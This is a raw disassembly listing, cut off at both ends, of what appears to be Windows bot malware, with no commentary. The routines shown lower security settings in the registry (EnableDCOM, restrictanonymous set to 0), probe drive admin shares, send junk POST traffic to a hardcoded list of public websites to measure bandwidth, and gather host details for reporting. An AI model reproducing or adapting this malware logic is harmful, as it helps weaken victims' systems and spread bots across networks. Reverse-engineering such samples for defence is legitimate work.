[ebp+var_4], ebx jb loc_41A12D loc_41A0AD: ; CODE XREF: sub_419E7A+2AFj mov edi, [esi] push edi call sub_41D817 cmp word ptr [edi+eax*2-2], 24h pop ecx jnz short loc_41A122 push edi call sub_418B59 push eax push 0 call sub_418C6C add esp, 0Ch push dword ptr [esi] test eax, eax jnz short loc_41A0DC push offset dword_43A184 jmp short loc_41A0E1 ; --------------------------------------------------------------------------- loc_41A0DC: ; CODE XREF: sub_419E7A+259j push offset dword_43A158 loc_41A0E1: ; CODE XREF: sub_419E7A+260j lea eax, [ebp+var_214] push 200h push eax call sub_41B980 add esp, 10h cmp [ebp+arg_C], 0 jnz short loc_41A115 push 1 lea eax, [ebp+var_214] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A115: ; CODE XREF: sub_419E7A+27Fj lea eax, [ebp+var_214] push eax call sub_4151AD pop ecx loc_41A122: ; CODE XREF: sub_419E7A+242j add esi, 28h inc ebx cmp ebx, [ebp+var_4] jbe short loc_41A0AD xor edi, edi loc_41A12D: ; CODE XREF: sub_419E7A+22Dj push [ebp+var_8] call ds:dword_4CB6E4 loc_41A136: ; CODE XREF: sub_419E7A+21Fj cmp [ebp+var_10], 0EAh jz loc_41A001 lea eax, [ebp+var_214] push offset dword_43A130 push eax call sub_41B886 pop ecx pop ecx pop ebx jmp short loc_41A16C ; --------------------------------------------------------------------------- loc_41A159: ; CODE XREF: sub_419E7A+177j lea eax, [ebp+var_214] push offset dword_43A100 push eax call sub_41B886 pop ecx pop ecx loc_41A16C: ; CODE XREF: sub_419E7A+2DDj cmp [ebp+arg_C], edi jnz short loc_41A18A push edi lea eax, [ebp+var_214] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A18A: ; CODE XREF: sub_419E7A+2F5j lea eax, [ebp+var_214] push eax call sub_4151AD pop ecx push 1 pop eax pop edi pop esi leave retn sub_419E7A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41A19E proc near ; CODE XREF: sub_419E1A:loc_419E61p var_220 = byte ptr -220h var_20 = byte ptr -20h var_14 = byte ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 220h push ebx xor ebx, ebx cmp ds:dword_4CB724, ebx push esi jnz loc_41A2CC lea eax, [ebp+var_4] mov esi, 80000002h push eax push 2001Fh push ebx push offset aSoftwareMicros ; "Software\\Microsoft\\OLE" push esi call ds:dword_4CB6C4 ; RegOpenKeyExA test eax, eax jnz short loc_41A229 mov ax, word_438E5C mov word ptr [ebp+var_8+2], ax lea eax, [ebp+var_8+2] push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_8+2] push eax push 1 push ebx push offset aEnabledcom ; "EnableDCOM" push [ebp+var_4] call ds:dword_4CB678 ; RegSetValueExA test eax, eax jz short loc_41A20B push offset dword_43A4B0 jmp short loc_41A210 ; --------------------------------------------------------------------------- loc_41A20B: ; CODE XREF: sub_41A19E+64j push offset dword_43A494 loc_41A210: ; CODE XREF: sub_41A19E+6Bj lea eax, [ebp+var_220] push eax call sub_41B886 pop ecx pop ecx push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey jmp short loc_41A23C ; --------------------------------------------------------------------------- loc_41A229: ; CODE XREF: sub_41A19E+36j lea eax, [ebp+var_220] push offset dword_43A2E8 push eax call sub_41B886 pop ecx pop ecx loc_41A23C: ; CODE XREF: sub_41A19E+89j cmp [ebp+arg_C], ebx jnz short loc_41A25B push 1 lea eax, [ebp+var_220] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A25B: ; CODE XREF: sub_41A19E+A1j lea eax, [ebp+var_220] push eax call sub_4151AD pop ecx lea eax, [ebp+var_4] push eax push 0F003Fh push ebx push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa" push esi call ds:dword_4CB6C4 ; RegOpenKeyExA test eax, eax jnz short loc_41A2C5 lea eax, [ebp+var_8] push 4 push eax push 4 push ebx push offset aRestrictanonym ; "restrictanonymous" push [ebp+var_4] mov [ebp+var_8], ebx call ds:dword_4CB678 ; RegSetValueExA test eax, eax jz short loc_41A2A7 push offset dword_43A454 jmp short loc_41A2AC ; --------------------------------------------------------------------------- loc_41A2A7: ; CODE XREF: sub_41A19E+100j push offset dword_43A41C loc_41A2AC: ; CODE XREF: sub_41A19E+107j lea eax, [ebp+var_220] push eax call sub_41B886 pop ecx pop ecx push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey jmp short loc_41A2DF ; --------------------------------------------------------------------------- loc_41A2C5: ; CODE XREF: sub_41A19E+E2j push offset dword_43A3E0 jmp short loc_41A2D1 ; --------------------------------------------------------------------------- loc_41A2CC: ; CODE XREF: sub_41A19E+13j push offset dword_43A1F8 loc_41A2D1: ; CODE XREF: sub_41A19E+12Cj lea eax, [ebp+var_220] push eax call sub_41B886 pop ecx pop ecx loc_41A2DF: ; CODE XREF: sub_41A19E+125j cmp [ebp+arg_C], ebx jnz short loc_41A2FE push 1 lea eax, [ebp+var_220] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A2FE: ; CODE XREF: sub_41A19E+144j lea eax, [ebp+var_220] push eax call sub_4151AD cmp ds:dword_4CB74C, ebx pop ecx jnz loc_41A473 push edi mov esi, offset off_43A0C0 mov edi, 200h loc_41A322: ; CODE XREF: sub_41A19E+1E9j push dword ptr [esi+4] push dword ptr [esi] push ebx call sub_418BC0 add esp, 0Ch push dword ptr [esi] test eax, eax jnz short loc_41A33D push offset dword_43A3C0 jmp short loc_41A342 ; --------------------------------------------------------------------------- loc_41A33D: ; CODE XREF: sub_41A19E+196j push offset dword_43A398 loc_41A342: ; CODE XREF: sub_41A19E+19Dj lea eax, [ebp+var_220] push edi push eax call sub_41B980 add esp, 10h cmp [ebp+arg_C], ebx jnz short loc_41A371 push 1 lea eax, [ebp+var_220] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A371: ; CODE XREF: sub_41A19E+1B7j lea eax, [ebp+var_220] push eax call sub_4151AD add esi, 8 pop ecx cmp esi, offset off_43A0D0 jb short loc_41A322 call dword_427190 ; GetLogicalDrives test eax, eax mov [ebp+var_4], eax mov bl, 41h jz loc_41A45B loc_41A39C: ; CODE XREF: sub_41A19E+2B7j mov eax, [ebp+var_4] and eax, 1 cmp al, 1 jnz loc_41A450 cmp bl, 41h jz loc_41A450 movsx esi, bl push esi push offset aC_1 ; "%c$" lea eax, [ebp+var_14] push 0Ah push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_20] push esi push offset aC_0 ; "%c:\\" push 0Ah push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_20] push eax call ds:dword_4CB6B4 ; GetDriveTypeA cmp eax, 3 jnz short loc_41A450 lea eax, [ebp+var_20] push eax lea eax, [ebp+var_14] push eax push 0 call sub_418BC0 add esp, 0Ch test eax, eax lea eax, [ebp+var_14] push eax jnz short loc_41A40E push offset dword_43A3C0 jmp short loc_41A413 ; --------------------------------------------------------------------------- loc_41A40E: ; CODE XREF: sub_41A19E+267j push offset dword_43A398 loc_41A413: ; CODE XREF: sub_41A19E+26Ej lea eax, [ebp+var_220] push edi push eax call sub_41B980 add esp, 10h cmp [ebp+arg_C], 0 jnz short loc_41A443 push 1 lea eax, [ebp+var_220] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A443: ; CODE XREF: sub_41A19E+289j lea eax, [ebp+var_220] push eax call sub_4151AD pop ecx loc_41A450: ; CODE XREF: sub_41A19E+206j ; sub_41A19E+20Fj ... inc bl shr [ebp+var_4], 1 jnz loc_41A39C loc_41A45B: ; CODE XREF: sub_41A19E+1F8j lea eax, [ebp+var_220] push offset dword_43A368 push eax call sub_41B886 pop ecx xor ebx, ebx pop ecx pop edi jmp short loc_41A486 ; --------------------------------------------------------------------------- loc_41A473: ; CODE XREF: sub_41A19E+173j lea eax, [ebp+var_220] push offset dword_43A100 push eax call sub_41B886 pop ecx pop ecx loc_41A486: ; CODE XREF: sub_41A19E+2D3j cmp [ebp+arg_C], ebx jnz short loc_41A4A4 push ebx lea eax, [ebp+var_220] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h loc_41A4A4: ; CODE XREF: sub_41A19E+2EBj lea eax, [ebp+var_220] push eax call sub_4151AD pop ecx push 1 pop eax pop esi pop ebx leave retn sub_41A19E endp ; =============== S U B R O U T I N E ======================================= sub_41A4B8 proc near ; CODE XREF: sub_41A6AF+CBp ; sub_41A6AF+DDp ... arg_0 = dword ptr 4 call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 cdq idiv [esp+arg_0] mov eax, edx retn sub_41A4B8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41A4D2 proc near ; CODE XREF: sub_41A6AF+D4p ; sub_41A6AF+E6p ... var_38 = dword ptr -38h var_28 = word ptr -28h var_26 = word ptr -26h var_24 = dword ptr -24h var_18 = qword ptr -18h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 28h push ebx push esi push edi push [ebp+arg_0] call sub_41AFE0 mov esi, 0FFh pop ecx cmp eax, esi ja loc_41A6AB push 10h lea eax, [ebp+var_28] push 0 push eax call sub_41B590 push [ebp+arg_0] mov [ebp+var_28], 2 call sub_40AAFA add esp, 10h mov [ebp+var_24], eax test eax, eax jz loc_41A6AB push 50h call ds:dword_4CB654 ; htons push 6 push 1 push 2 mov [ebp+var_26], ax call ds:dword_4CB6D4 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_41A6AB lea ecx, [ebp+var_28] push 10h push ecx push eax call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jz loc_41A6AB push 32003h call sub_41CFC5 mov edi, dword_4270A8 mov ebx, eax pop ecx mov [ebp+var_8], ebx call edi ; GetTickCount push eax call sub_41B8D8 call sub_41B8E2 cdq idiv esi mov [esp+38h+var_38], 32001h push 0 push ebx movsx esi, dl call sub_41B590 push 32000h push esi push ebx call sub_41B590 push ebx call sub_41AFE0 push 323EAh mov ebx, eax call sub_41CFC5 add esp, 20h mov esi, eax push ebx push [ebp+arg_0] push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"... push esi call sub_41B886 push [ebp+var_8] push esi call sub_41BEC0 push offset asc_433F14 ; "\r\n" push esi call sub_41BEC0 push esi call sub_41AFE0 mov ebx, eax add esp, 24h mov [ebp+var_10], ebx call edi ; GetTickCount mov dword ptr [ebp+var_18+4], eax xor eax, eax test ebx, ebx mov [ebp+arg_0], eax jbe short loc_41A62B mov [ebp+var_C], ebx mov ebx, 400h jmp short loc_41A5FB ; --------------------------------------------------------------------------- loc_41A5F8: ; CODE XREF: sub_41A4D2+157j mov eax, [ebp+arg_0] loc_41A5FB: ; CODE XREF: sub_41A4D2+124j mov ecx, [ebp+var_10] push 0 sub ecx, eax cmp ecx, ebx jnb short loc_41A60B push [ebp+var_C] jmp short loc_41A60C ; --------------------------------------------------------------------------- loc_41A60B: ; CODE XREF: sub_41A4D2+132j push ebx loc_41A60C: ; CODE XREF: sub_41A4D2+137j add eax, esi push eax push [ebp+var_4] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jz short loc_41A692 add [ebp+arg_0], ebx sub [ebp+var_C], ebx mov eax, [ebp+arg_0] cmp eax, [ebp+var_10] jb short loc_41A5F8 loc_41A62B: ; CODE XREF: sub_41A4D2+11Aj call edi ; GetTickCount sub eax, dword ptr [ebp+var_18+4] and dword ptr [ebp+var_18+4], 0 mov dword ptr [ebp+var_18], eax fild [ebp+var_18] fmul flt_42770C fst [ebp+arg_0] fcomp flt_427708 fnstsw ax sahf jnz short loc_41A653 fld1 fstp [ebp+arg_0] loc_41A653: ; CODE XREF: sub_41A4D2+17Aj push [ebp+var_4] call ds:dword_4CB6EC ; closesocket push [ebp+var_8] call sub_41B0B1 push esi call sub_41B0B1 mov eax, [ebp+var_10] and dword ptr [ebp+var_18+4], 0 mov dword ptr [ebp+var_18], eax pop ecx fild [ebp+var_18] pop ecx fdiv [ebp+arg_0] fmul flt_427704 fmul flt_427700 call sub_41C798 loc_41A68D: ; CODE XREF: sub_41A4D2+1DBj pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_41A692: ; CODE XREF: sub_41A4D2+149j push [ebp+var_4] call ds:dword_4CB6EC ; closesocket push [ebp+var_8] call sub_41B0B1 push esi call sub_41B0B1 pop ecx pop ecx loc_41A6AB: ; CODE XREF: sub_41A4D2+19j ; sub_41A4D2+42j ... xor eax, eax jmp short loc_41A68D sub_41A4D2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41A6AF proc near ; CODE XREF: sub_401ACD+2E62p var_26C = byte ptr -26Ch var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 26Ch push ebx push esi push edi push 8 mov [ebp+var_4], 3 mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net" mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl" mov [ebp+var_34], offset aVerio_fr ; "verio.fr" mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de" mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch" mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de" mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com" mov [ebp+var_20], offset aWww_google_it ; "www.google.it" mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net" mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu" mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com" mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com" mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu" mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com" mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net" mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu" mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com" mov [ebp+var_48], offset aWww_above_net ; "www.above.net" mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com" mov [ebp+var_40], offset aWww_google_com ; "www.google.com" mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw" mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp" mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com" mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com" mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp" mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp" call sub_41A4B8 push [ebp+eax*4+var_3C] call sub_41A4D2 push 8 mov esi, eax call sub_41A4B8 push [ebp+eax*4+var_3C] call sub_41A4D2 add esp, 10h test esi, esi jz short loc_41A7B0 test eax, eax jz short loc_41A7AC lea ebx, [eax+esi] shr ebx, 1 jmp short loc_41A7B2 ; --------------------------------------------------------------------------- loc_41A7AC: ; CODE XREF: sub_41A6AF+F4j mov ebx, esi jmp short loc_41A7B2 ; --------------------------------------------------------------------------- loc_41A7B0: ; CODE XREF: sub_41A6AF+F0j mov ebx, eax loc_41A7B2: ; CODE XREF: sub_41A6AF+FBj ; sub_41A6AF+FFj push 0Ch call sub_41A4B8 push [ebp+eax*4+var_6C] call sub_41A4D2 push 0Ch mov edi, eax call sub_41A4B8 push [ebp+eax*4+var_6C] call sub_41A4D2 add esp, 10h test edi, edi jz short loc_41A7EA test eax, eax jz short loc_41A7E6 lea esi, [eax+edi] shr esi, 1 jmp short loc_41A7EC ; --------------------------------------------------------------------------- loc_41A7E6: ; CODE XREF: sub_41A6AF+12Ej mov esi, edi jmp short loc_41A7EC ; --------------------------------------------------------------------------- loc_41A7EA: ; CODE XREF: sub_41A6AF+12Aj mov esi, eax loc_41A7EC: ; CODE XREF: sub_41A6AF+135j ; sub_41A6AF+139j push 6 call sub_41A4B8 push [ebp+eax*4+var_1C] call sub_41A4D2 push 6 mov edi, eax call sub_41A4B8 push [ebp+eax*4+var_1C] call sub_41A4D2 add esp, 10h test edi, edi jz short loc_41A824 test eax, eax jz short loc_41A820 lea ecx, [eax+edi] shr ecx, 1 jmp short loc_41A826 ; --------------------------------------------------------------------------- loc_41A820: ; CODE XREF: sub_41A6AF+168j mov ecx, edi jmp short loc_41A826 ; --------------------------------------------------------------------------- loc_41A824: ; CODE XREF: sub_41A6AF+164j mov ecx, eax loc_41A826: ; CODE XREF: sub_41A6AF+16Fj ; sub_41A6AF+173j xor eax, eax test ebx, ebx jz short loc_41A833 mov edi, [ebp+var_4] mov eax, ebx jmp short loc_41A836 ; --------------------------------------------------------------------------- loc_41A833: ; CODE XREF: sub_41A6AF+17Bj push 2 pop edi loc_41A836: ; CODE XREF: sub_41A6AF+182j test esi, esi jz short loc_41A83E add eax, esi jmp short loc_41A83F ; --------------------------------------------------------------------------- loc_41A83E: ; CODE XREF: sub_41A6AF+189j dec edi loc_41A83F: ; CODE XREF: sub_41A6AF+18Dj test ecx, ecx jz short loc_41A847 add eax, ecx jmp short loc_41A848 ; --------------------------------------------------------------------------- loc_41A847: ; CODE XREF: sub_41A6AF+192j dec edi loc_41A848: ; CODE XREF: sub_41A6AF+196j xor edx, edx div edi push eax push ecx push esi push ebx lea eax, [ebp+var_26C] push offset dword_43A508 push eax call sub_41B886 push 0 lea eax, [ebp+var_26C] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_26C] push eax call sub_4151AD add esp, 30h pop edi pop esi pop ebx leave retn sub_41A6AF endp ; =============== S U B R O U T I N E ======================================= sub_41A88C proc near ; CODE XREF: sub_401ACD+25A1p ; sub_401ACD+2A11p ... arg_0 = dword ptr 4 push ebx push ebp push esi push edi call dword_4270A8 ; GetTickCount xor edx, edx mov ecx, 3E8h div ecx mov ebx, 15180h xor edx, edx mov esi, ebx mov edi, 0E10h mov ebp, edi push 3Ch mov ecx, eax sub ecx, [esp+14h+arg_0] mov eax, ecx div esi mov esi, edx xor edx, edx mov eax, esi div ebp pop ebp mov eax, edx xor edx, edx div ebp xor edx, edx push eax mov eax, esi div edi xor edx, edx mov esi, offset dword_4DB920 push eax mov eax, ecx div ebx push eax push offset aDdDhDm ; "%dd %dh %dm" push 32h push esi call sub_41B980 add esp, 18h mov eax, esi pop edi pop esi pop ebp pop ebx retn sub_41A88C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41A8F5 proc near ; CODE XREF: sub_416F1B+24p var_94 = dword ptr -94h var_90 = dword ptr -90h var_8C = dword ptr -8Ch var_84 = dword ptr -84h push ebp mov ebp, esp sub esp, 94h lea eax, [ebp+var_94] push esi push eax xor esi, esi mov [ebp+var_94], 94h call dword_4270C8 ; GetVersionExA test eax, eax jz short loc_41A988 cmp [ebp+var_90], 4 jnz short loc_41A95E cmp [ebp+var_8C], esi jnz short loc_41A946 cmp [ebp+var_84], 1 jnz short loc_41A939 push 1 pop esi loc_41A939: ; CODE XREF: sub_41A8F5+3Fj cmp [ebp+var_84], 2 jnz short loc_41A988 push 1 jmp short loc_41A987 ; --------------------------------------------------------------------------- loc_41A946: ; CODE XREF: sub_41A8F5+36j cmp [ebp+var_8C], 0Ah jnz short loc_41A953 loc_41A94F: ; CODE XREF: sub_41A8F5+78j push 2 jmp short loc_41A987 ; --------------------------------------------------------------------------- loc_41A953: ; CODE XREF: sub_41A8F5+58j cmp [ebp+var_8C], 5Ah jnz short loc_41A988 jmp short loc_41A978 ; --------------------------------------------------------------------------- loc_41A95E: ; CODE XREF: sub_41A8F5+2Ej cmp [ebp+var_90], 5 jnz short loc_41A988 cmp [ebp+var_8C], esi jz short loc_41A94F cmp [ebp+var_8C], 1 jnz short loc_41A97C loc_41A978: ; CODE XREF: sub_41A8F5+67j push 3 jmp short loc_41A987 ; --------------------------------------------------------------------------- loc_41A97C: ; CODE XREF: sub_41A8F5+81j cmp [ebp+var_8C], 2 jnz short loc_41A988 push 7 loc_41A987: ; CODE XREF: sub_41A8F5+4Fj ; sub_41A8F5+5Cj ... pop esi loc_41A988: ; CODE XREF: sub_41A8F5+25j ; sub_41A8F5+4Bj ... mov eax, esi pop esi leave retn sub_41A8F5 endp ; =============== S U B R O U T I N E ======================================= sub_41A98D proc near ; CODE XREF: sub_41AA43+290p push ebx push esi push edi mov esi, 0F4240h loc_41A995: ; CODE XREF: sub_41A98D+2Fj ; sub_41A98D+35j rdtsc push 3E8h mov edi, edx mov ebx, eax call dword_427078 ; Sleep rdtsc sub eax, ebx push 0 sbb edx, edi push esi push edx push eax call sub_41D410 mov edi, edx mov ebx, eax test edi, edi ja short loc_41A995 jb short loc_41A9C4 cmp ebx, esi ja short loc_41A995 loc_41A9C4: ; CODE XREF: sub_41A98D+31j push 0 push 64h push edi push ebx call sub_41D480 mov ecx, edx push 64h xor edx, edx mov esi, eax test ecx, ecx pop eax ja short loc_41AA37 jb short loc_41A9E3 cmp esi, 50h jnb short loc_41A9E8 loc_41A9E3: ; CODE XREF: sub_41A98D+4Fj push 4Bh xor edx, edx pop eax loc_41A9E8: ; CODE XREF: sub_41A98D+54j test ecx, ecx ja short loc_41AA37 jb short loc_41A9F3 cmp esi, 47h jnb short loc_41A9F8 loc_41A9F3: ; CODE XREF: sub_41A98D+5Fj push 42h xor edx, edx pop eax loc_41A9F8: ; CODE XREF: sub_41A98D+64j test ecx, ecx ja short loc_41AA37 jb short loc_41AA03 cmp esi, 37h jnb short loc_41AA08 loc_41AA03: ; CODE XREF: sub_41A98D+6Fj push 32h xor edx, edx pop eax loc_41AA08: ; CODE XREF: sub_41A98D+74j test ecx, ecx ja short loc_41AA37 jb short loc_41AA13 cmp esi, 26h jnb short loc_41AA18 loc_41AA13: ; CODE XREF: sub_41A98D+7Fj push 21h xor edx, edx pop eax loc_41AA18: ; CODE XREF: sub_41A98D+84j test ecx, ecx ja short loc_41AA37 jb short loc_41AA23 cmp esi, 1Eh jnb short loc_41AA28 loc_41AA23: ; CODE XREF: sub_41A98D+8Fj push 19h xor edx, edx pop eax loc_41AA28: ; CODE XREF: sub_41A98D+94j test ecx, ecx ja short loc_41AA37 jb short loc_41AA33 cmp esi, 0Ah jnb short loc_41AA37 loc_41AA33: ; CODE XREF: sub_41A98D+9Fj xor eax, eax xor edx, edx loc_41AA37: ; CODE XREF: sub_41A98D+4Dj ; sub_41A98D+5Dj ... sub eax, esi sbb edx, ecx add eax, ebx adc edx, edi pop edi pop esi pop ebx retn sub_41A98D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41AA43 proc near ; CODE XREF: sub_401ACD+276Fp var_7E8 = byte ptr -7E8h var_668 = byte ptr -668h var_5E8 = byte ptr -5E8h var_568 = byte ptr -568h var_4E8 = byte ptr -4E8h var_3E4 = byte ptr -3E4h var_2E8 = byte ptr -2E8h var_25C = word ptr -25Ch var_25A = byte ptr -25Ah var_15C = byte ptr -15Ch var_114 = byte ptr -114h var_CC = dword ptr -0CCh var_C8 = dword ptr -0C8h var_C4 = dword ptr -0C4h var_C0 = dword ptr -0C0h var_BC = dword ptr -0BCh var_B8 = byte ptr -0B8h var_38 = byte ptr -38h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_18 = byte ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 7E8h push ebx push esi lea eax, [ebp+var_CC] push edi push eax mov [ebp+var_4], offset byte_43D808 mov [ebp+var_CC], 94h call dword_4270C8 ; GetVersionExA xor ebx, ebx cmp [ebp+var_C8], 4 jnz short loc_41AACA cmp [ebp+var_C4], ebx jnz short loc_41AAA6 cmp [ebp+var_BC], 1 jnz short loc_41AA90 mov [ebp+var_4], offset dword_431974 loc_41AA90: ; CODE XREF: sub_41AA43+44j cmp [ebp+var_BC], 2 jnz loc_41AB45 mov [ebp+var_4], offset dword_431970 jmp short loc_41AB16 ; --------------------------------------------------------------------------- loc_41AAA6: ; CODE XREF: sub_41AA43+3Bj cmp [ebp+var_C4], 0Ah jnz short loc_41AAB8 mov [ebp+var_4], offset dword_43196C jmp short loc_41AB0D ; --------------------------------------------------------------------------- loc_41AAB8: ; CODE XREF: sub_41AA43+6Aj cmp [ebp+var_C4], 5Ah jnz short loc_41AB06 mov [ebp+var_4], offset dword_431968 jmp short loc_41AB0D ; --------------------------------------------------------------------------- loc_41AACA: ; CODE XREF: sub_41AA43+33j cmp [ebp+var_C8], 5 jnz short loc_41AB06 cmp [ebp+var_C4], ebx jnz short loc_41AAE4 mov [ebp+var_4], offset dword_431964 jmp short loc_41AB0D ; --------------------------------------------------------------------------- loc_41AAE4: ; CODE XREF: sub_41AA43+96j cmp [ebp+var_C4], 1 jnz short loc_41AAF6 mov [ebp+var_4], offset dword_431960 jmp short loc_41AB0D ; --------------------------------------------------------------------------- loc_41AAF6: ; CODE XREF: sub_41AA43+A8j cmp [ebp+var_C4], 2 mov [ebp+var_4], offset a2003 ; "2003" jz short loc_41AB0D loc_41AB06: ; CODE XREF: sub_41AA43+7Cj ; sub_41AA43+8Ej mov [ebp+var_4], offset dword_431958 loc_41AB0D: ; CODE XREF: sub_41AA43+73j ; sub_41AA43+85j ... cmp [ebp+var_BC], 2 jnz short loc_41AB45 loc_41AB16: ; CODE XREF: sub_41AA43+61j cmp [ebp+var_B8], bl jz short loc_41AB45 lea eax, [ebp+var_B8] push eax lea eax, [ebp+var_2E8] push [ebp+var_4] push offset aSS_2 ; "%s (%s)" push eax call sub_41B886 lea eax, [ebp+var_2E8] add esp, 10h mov [ebp+var_4], eax loc_41AB45: ; CODE XREF: sub_41AA43+54j ; sub_41AA43+D1j ... mov ax, word_437F2C push 3Fh mov [ebp+var_25C], ax pop ecx xor eax, eax lea edi, [ebp+var_25A] rep stosd stosw mov eax, ds:dword_4CB534 mov [ebp+var_C], 100h cmp eax, ebx jz short loc_41AB7E lea ecx, [ebp+var_C] push ecx lea ecx, [ebp+var_25C] push ecx call eax ; GetUserNameA loc_41AB7E: ; CODE XREF: sub_41AA43+12Cj push [ebp+arg_4] call sub_40AC10 pop ecx push eax call ds:dword_4CB694 ; inet_addr mov [ebp+var_8], eax push 2 lea eax, [ebp+var_8] push 4 push eax call ds:dword_4CB60C ; gethostbyaddr cmp eax, ebx jz short loc_41ABA7 push dword ptr [eax] jmp short loc_41ABAC ; --------------------------------------------------------------------------- loc_41ABA7: ; CODE XREF: sub_41AA43+15Ej push offset aCouldnTResolve ; "couldn't resolve host" loc_41ABAC: ; CODE XREF: sub_41AA43+162j lea eax, [ebp+var_3E4] push eax call sub_41B886 pop ecx lea eax, [ebp+var_4E8] pop ecx push 104h push eax call dword_427074 ; GetSystemDirectoryA lea eax, [ebp+var_114] push 46h push eax push offset dword_43A7FC push ebx mov esi, 409h push ebx push esi call dword_427104 ; GetDateFormatA lea eax, [ebp+var_15C] push 46h push eax push offset aHhMmSs ; "HH:mm:ss" push ebx push ebx push esi call dword_427100 ; GetTimeFormatA push 20h lea eax, [ebp+var_38] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_38] push eax call dword_427194 ; GlobalMemoryStatus push ebx push ebx lea eax, [ebp+var_18] push ebx push eax lea eax, [ebp+var_4E8] push eax call sub_41B9D1 lea eax, [ebp+var_18] push eax lea eax, [ebp+var_7E8] push eax call sub_416A33 push 60h mov esi, eax pop ecx lea edi, [ebp+var_7E8] rep movsd push 60h lea esi, [ebp+var_7E8] pop ecx lea edi, [ebp+var_668] rep movsd push ebx call sub_41A88C add esp, 20h push eax lea eax, [ebp+var_15C] push eax lea eax, [ebp+var_114] push eax lea eax, [ebp+var_25C] push eax push [ebp+arg_4] call sub_40AC10 pop ecx push eax lea eax, [ebp+var_3E4] push eax lea eax, [ebp+var_4E8] push eax lea eax, [ebp+var_5E8] push [ebp+var_C0] push [ebp+var_C4] push [ebp+var_C8] push [ebp+var_4] push eax lea eax, [ebp+var_568] push eax mov eax, [ebp+var_2C] shr eax, 0Ah push ebx push eax call sub_416923 pop ecx pop ecx push eax mov eax, [ebp+var_30] shr eax, 0Ah push ebx push eax call sub_416923 pop ecx pop ecx push eax call sub_41A98D push edx push eax push offset dword_43A720 push 200h push [ebp+arg_0] call sub_41B980 mov eax, 